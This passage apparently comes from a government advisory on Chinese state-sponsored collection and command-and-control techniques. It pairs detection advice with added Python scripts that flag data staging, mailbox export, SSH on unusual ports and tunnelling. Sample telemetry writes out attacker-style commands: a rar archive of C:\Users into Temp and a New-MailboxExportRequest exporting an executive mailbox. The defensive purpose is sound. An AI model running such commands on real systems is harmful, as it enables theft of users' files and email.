    • Inbound Traffic Filtering [D3-ITF]

    • Outbound Traffic Filtering [D3-OTF]

Data Staged [T1074]

Chinese state-sponsored cyber actors have been observed using the mv command to move files into a staging location, such as a compromised Microsoft Exchange server, IIS server, or emplaced webshell, prior to compressing and exfiltrating the data from the target network.

Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.

Detect: 

Email Collection [T1114]

Chinese state-sponsored cyber actors have been observed using the New-MailboxExportRequest PowerShell cmdlet to export target email boxes.

  • Audit email auto-forwarding rules for suspicious or unrecognized rulesets.

  • Encrypt email using public key cryptography, where feasible.

  • Use MFA on public-facing mail servers.

Harden:

  • Credential Hardening

  • Message Hardening

Detect: 
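The staging and collection checks described in the Collection rows above (archival utilities unusual for the environment, processes that read from many directories and write to one, and the New-MailboxExportRequest cmdlet), as an added example that is not code from the advisory or from CISA. It works over constructed file-access and process events; the event shapes, the archiver baseline, the directory threshold and all sample data are assumptions.

```python
"""Spot data staging and collection tooling (TA0009) in endpoint telemetry.

Added example. The two event shapes (file-access events with pid/image/op/
path, process events with pid/image/cmdline), the archiver baseline and
the sample data are assumptions, not advisory data.
"""
import ntpath

ARCHIVE_TOOLS = {"rar.exe", "winrar.exe", "7z.exe", "7za.exe", "makecab.exe", "tar.exe"}
ARCHIVE_EXTS = (".rar", ".7z", ".zip", ".cab", ".tar", ".gz")
# Archivers that are normal in this (assumed) environment and should not alert.
BASELINE_TOOLS = {"7z.exe"}


def detect_staging(file_events, min_source_dirs=3):
    """Processes that read files from several directories and write to a
    single directory: the pattern the advisory describes for staging."""
    per_proc = {}
    for ev in file_events:
        rec = per_proc.setdefault(ev["pid"], {
            "image": ev["image"], "read_dirs": set(), "write_dirs": set(), "archive_out": False})
        directory = ntpath.dirname(ev["path"]).lower()
        if ev["op"] == "read":
            rec["read_dirs"].add(directory)
        elif ev["op"] == "write":
            rec["write_dirs"].add(directory)
            if ev["path"].lower().endswith(ARCHIVE_EXTS):
                rec["archive_out"] = True
    findings = []
    for pid, rec in per_proc.items():
        if len(rec["read_dirs"]) >= min_source_dirs and len(rec["write_dirs"]) == 1:
            findings.append({
                "pid": pid,
                "image": rec["image"],
                "dest": next(iter(rec["write_dirs"])),
                "source_dirs": len(rec["read_dirs"]),
                "archive_output": rec["archive_out"],
            })
    return findings


def detect_collection_tools(proc_events):
    """(pid, finding) for archivers outside the baseline and for the Exchange
    mailbox export cmdlet named in the advisory."""
    findings = []
    for ev in proc_events:
        image = ntpath.basename(ev["image"]).lower()
        if image in ARCHIVE_TOOLS and image not in BASELINE_TOOLS:
            findings.append((ev["pid"], "uncommon_archiver"))
        if "new-mailboxexportrequest" in ev["cmdline"].lower():
            findings.append((ev["pid"], "mailbox_export"))
    return findings


def _fe(pid, image, op, path):
    return {"pid": pid, "image": image, "op": op, "path": path}


# Constructed sample telemetry (not real data).
RAR, WORD, SYNC = r"C:\Users\Public\rar.exe", r"C:\Program Files\Office\word.exe", r"C:\Program Files\Sync\sync.exe"
FILE_EVENTS = [
    # Three source directories funnelled into one archive in Temp: staging.
    _fe(4401, RAR, "read", r"C:\Users\alice\Documents\q1.xlsx"),
    _fe(4401, RAR, "read", r"C:\Users\bob\Desktop\plan.docx"),
    _fe(4401, RAR, "read", r"C:\Finance\Reports\fy.pdf"),
    _fe(4401, RAR, "write", r"C:\Windows\Temp\archive.rar"),
    # An editor touching one document: one source directory, not staging.
    _fe(5120, WORD, "read", r"C:\Users\alice\Documents\memo.docx"),
    _fe(5120, WORD, "write", r"C:\Users\alice\Documents\memo.docx"),
    # A sync client mirroring to two destinations: many sources, but not one sink.
    _fe(6001, SYNC, "read", r"C:\Users\carol\Pictures\a.jpg"),
    _fe(6001, SYNC, "read", r"C:\Users\carol\Music\b.mp3"),
    _fe(6001, SYNC, "read", r"C:\Users\carol\Videos\c.mp4"),
    _fe(6001, SYNC, "write", r"D:\Mirror\Pictures\a.jpg"),
    _fe(6001, SYNC, "write", r"D:\Mirror\Music\b.mp3"),
]
PROC_EVENTS = [
    {"pid": 4401, "image": RAR, "cmdline": r"rar.exe a -r C:\Windows\Temp\archive.rar C:\Users"},
    {"pid": 7000, "image": r"C:\Program Files\7-Zip\7z.exe", "cmdline": r"7z.exe a D:\Backups\weekly.7z D:\Data"},
    {"pid": 7100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe New-MailboxExportRequest -Mailbox exec01 -FilePath \\FILESRV\pst\exec01.pst"},
]

if __name__ == "__main__":
    print(detect_staging(FILE_EVENTS))
    print(detect_collection_tools(PROC_EVENTS))
```

Most endpoint sensors record file creations reliably but file reads only selectively, so in practice the read side of the staging check is usually fed from a dedicated file-access audit or from the archiver's own command line (the paths passed to it), with the same many-sources-to-one-sink logic applied.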

Tactics: Command and Control [TA0011]

Table XII: Chinese state-sponsored cyber actors’ Command and Control TTPs with detection and mitigation recommendations

Columns: Threat Actor Technique / Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques

Application Layer Protocol [T1071]

Chinese state-sponsored cyber actors have been observed:

  • Using commercial cloud storage services for command and control.

  • Using malware implants that use the Dropbox® API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive® API.

Use network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.

Detect: 

Isolate: 

Ingress Tool Transfer [T1105]

Chinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances, Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.

  • Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. 

  • Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.

  • Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.

Isolate:

Non-Standard Port [T1571]

Chinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. 

  • Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.

  • Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.

  • Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.

Detect:  

  • Network Traffic Analysis

    • Client-server Payload Profiling [D3-CSPP]

    • Protocol Metadata Anomaly Detection [D3-PMAD]

Isolate:

  • Network Isolation

    • Inbound Traffic Filtering [D3-ITF]

    • Outbound Traffic Filtering [D3-OTF]

Protocol Tunneling [T1572]

Chinese state-sponsored cyber actors have been observed using tools like dog-tunnel and dns2tcp.exe to conceal C2 traffic with existing network activity. 

  • Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.

  • Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.

  • Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).

Detect: 

Proxy [T1090]

Chinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.

Monitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.

  • Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.

  • Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.

Detect: 

  • Network Traffic Analysis

    • Protocol Metadata Anomaly Detection [D3-PMAD]

    • Relay Pattern Analysis [D3-RPA]

Isolate: 
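The Non-Standard Port and Protocol Tunneling recommendations above (egress limited to required ports, packet contents that do not match the expected protocol for the port, and clients that send far more than they receive), as an added example that is not code from the advisory or from CISA. It runs those three checks over constructed flow records carrying the first client payload bytes; the record shape, the permitted egress ports, the ratio threshold and all sample flows are assumptions.

```python
"""Review egress flows for non-standard-port and tunnelling indicators (T1571, T1572).

Added example. The flow record shape (id, dst, dport, bytes_out, bytes_in,
first payload bytes), the permitted egress ports and the sample flows are
assumptions; the checks follow the advisory's C2 detection guidance.
"""

# What a defender expects to see on each well-known port.
EXPECTED_PROTOCOL = {22: "ssh", 80: "http", 443: "tls", 53: "dns"}
# Egress ports this (assumed) network segment legitimately needs.
ALLOWED_EGRESS_PORTS = {53, 80, 443}
HTTP_METHODS = {b"GET", b"POST", b"HEAD", b"PUT", b"OPTIONS", b"CONNECT", b"DELETE"}


def fingerprint(payload: bytes) -> str:
    """Identify the application protocol from the first client bytes."""
    if payload.startswith(b"SSH-"):
        return "ssh"                 # SSH version exchange banner
    if len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03:
        return "tls"                 # TLS record header: handshake, version 3.x
    if payload.split(b" ", 1)[0] in HTTP_METHODS:
        return "http"
    return "unknown"                 # DNS and other binary protocols are not fingerprinted here


def analyze_flow(flow, upload_ratio=5, min_upload=100_000):
    """Sorted finding names for one flow."""
    findings = []
    proto = fingerprint(flow["payload"])
    port = flow["dport"]
    # Segment egress policy: anything outside the required ports is a violation.
    if port not in ALLOWED_EGRESS_PORTS:
        findings.append("egress_policy_violation")
    # Payload-versus-port checks: SSH anywhere but 22, or a known protocol on
    # a well-known port that expects a different one.
    if proto == "ssh" and port != 22:
        findings.append("ssh_on_nonstandard_port")
    elif proto != "unknown" and port in EXPECTED_PROTOCOL and EXPECTED_PROTOCOL[port] != proto:
        findings.append("protocol_port_mismatch")
    # Uncommon data flow: the client pushes far more than it pulls.
    if flow["bytes_out"] >= min_upload and flow["bytes_out"] > upload_ratio * flow["bytes_in"]:
        findings.append("upload_heavy")
    return sorted(findings)


def analyze_flows(flows):
    """flow id -> findings, for every flow in the batch."""
    return {flow["id"]: analyze_flow(flow) for flow in flows}


# Constructed sample flows (documentation address ranges; not real traffic).
SAMPLE_FLOWS = [
    {"id": 1, "dst": "203.0.113.10", "dport": 443, "bytes_out": 2_000, "bytes_in": 50_000,
     "payload": b"\x16\x03\x01\x02\x00\x01"},                 # ordinary TLS browsing
    {"id": 2, "dst": "198.51.100.7", "dport": 8443, "bytes_out": 900_000, "bytes_in": 40_000,
     "payload": b"SSH-2.0-OpenSSH_8.4\r\n"},                 # SSH to a VPS on an unusual port
    {"id": 3, "dst": "192.0.2.53", "dport": 53, "bytes_out": 5_000_000, "bytes_in": 200_000,
     "payload": b"\x12\x34\x01\x00\x00\x01"},                 # DNS-shaped, but megabytes outbound
    {"id": 4, "dst": "203.0.113.22", "dport": 22, "bytes_out": 3_000, "bytes_in": 60_000,
     "payload": b"SSH-2.0-OpenSSH_8.4\r\n"},                 # SSH on 22, not permitted from this segment
    {"id": 5, "dst": "203.0.113.80", "dport": 80, "bytes_out": 500, "bytes_in": 20_000,
     "payload": b"GET / HTTP/1.1\r\nHost: example.com\r\n"},  # plain HTTP
    {"id": 6, "dst": "198.51.100.9", "dport": 80, "bytes_out": 800, "bytes_in": 30_000,
     "payload": b"\x16\x03\x01\x02\x00\x01"},                 # TLS on the HTTP port
]

if __name__ == "__main__":
    for flow_id, findings in analyze_flows(SAMPLE_FLOWS).items():
        print(flow_id, findings or "-")
```

The fingerprint table is deliberately small; a production deployment would take the protocol label from the IDS or flow sensor's own service detection and keep only the policy and ratio logic shown here. Note that flow 3 is caught by the volume check alone, which is the practical way to see DNS-carried tunnels such as the dns2tcp usage the table describes, since the port and protocol both look legitimate.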

Appendix B: MITRE ATT&CK Framework 

Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors

Source…